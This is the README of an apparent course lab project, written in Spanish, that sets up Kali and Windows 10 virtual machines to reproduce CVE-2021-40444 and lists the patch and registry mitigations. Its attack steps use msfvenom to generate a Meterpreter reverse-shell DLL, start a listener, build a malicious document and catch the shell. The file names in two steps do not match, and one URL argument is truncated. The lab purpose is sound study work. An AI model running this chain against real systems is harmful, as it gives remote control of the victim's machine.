TIC4301_Project
TIC4301 Project - CVE-2021-40444
Descargue las siguientes cajas de Vagrant:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Importe las cajas con los siguientes comandos mediante Vagrant:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
Configuración (win10):
- En la caja de win10, inicie sesión como administrador con la contraseña vagrant.
- Haga clic derecho en script.ps1 en el escritorio y ejecútelo con powershell. (Deje esto abierto)
- Ejecute ipconfig.exe y obtenga la dirección de este host.
Configuración (Kali):
- cd Desktop/CVE-2021-40444.
- genere su dll malicioso con msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- inicie un listener en metasploit.
- genere el documento malicioso. # python3 exploit.py generate test/calc.dll http://
- visite http://<win 10 IP>/upload y suba el archivo.
- escuche la shell.
Mitigaciones:
- Instale la actualización KB5005565.
- Edite el registro de windows con patch.reg en el repositorio.